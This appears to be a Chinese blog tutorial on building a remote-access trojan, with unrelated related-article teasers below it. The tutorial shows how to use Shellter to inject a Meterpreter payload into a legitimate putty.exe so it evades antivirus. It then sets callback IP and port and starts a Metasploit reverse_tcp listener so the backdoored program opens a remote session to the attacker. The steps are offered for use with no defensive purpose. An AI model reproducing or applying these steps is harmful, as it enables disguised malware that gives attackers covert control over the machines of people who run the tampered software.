使用Shellter生成遠控木馬並進行持久化控制

2021-10-02 13:52:02 字數 1792 閱讀 8877

由於我這裡安裝的是最新版本的kali,沒有辦法直接在kali中開啟shellter.exe,即使是安裝了wine32後還是無法開啟(所以我這裡就在windows中演示 shellter的使用)。

1.在windows中開啟shellter.exe這裡選擇a代表的是自動模式,回車。

ps:這裡要注意的是,進行免殺的檔案一定要是32位的,64位的檔案是無法進行編譯注入的

這裡我選擇是的putty.exe也是大家常用來做演示的,由於這個軟體就在我shellter的目錄下面,所以我這裡就沒有輸入路徑了。

提示successfully表示成功了,此時原本的putty.exe檔案會被隔離到/shellter_backups/目錄下面,在程式的根目錄下面會生成乙個新的putty.exe(已經注入後門的)

y,這裡提示選擇列出的payload還是自定義,我們選擇l,輸入1選擇第乙個payload,然後設定回連ip和回連埠。

這裡的payloads列出來的就是msf中常用的監聽協議,就不具體介紹了。

set lhost:設定監聽ip位址(攻擊機的ip位址)

set lport:設定監聽埠

6.回車,等待,提示按任意鍵結束。

set payload windows/x64/meterpreter/reverse_tcp(payload要和上面在shellter中設定的一樣)
8.options:檢視引數

set lhost:設定監聽ip位址(和shellter中一樣)

set lport:設定監聽埠(和shellter中一樣)

exploit -j後台監聽執行。

11.將之前用shellter生成帶後門的檔案,在本機(windows2008)中測試看是否上線。

「大灰狼」遠控木馬分析及幕後真兇調查

360安全衛士 2015 11 08 14 04 以下是10月30日一天內大灰狼遠控的木馬樣本截圖,可以看到該木馬變種數量不少 偽裝形態更是花樣繁多。由於木馬樣本數量比較多,我們不一一枚舉,以下提供幾例來說明 本文用到的惡意 md5 0b1b9590ebde0aeddefadf2af8edf787 ...

使用PHP生成並匯出CSV檔案

csv檔案是以純文字形式儲存的,一般以逗號為分隔符。這裡主要簡單介紹下如何匯出csv檔案。匯出csv檔案 function exportcsv 頭資訊設定 header content type text csv header content disposition attachment filen...

使用Python處理Excel資料並生成詞云

從excel檔案中找出喜歡的崗位類別,將其對應的崗位描述進行分析處理,並做出詞雲圖。1.處理資料 找出自己喜歡的類別,我選的是崗位類別有 資料運營 機器學習 資料科學 資料分析師 資料產品經理 商業資料分析,將其統一替換為資料科學。提取處理後的資料中崗位類別為資料科學的崗位描述。2.進行文字預處理,...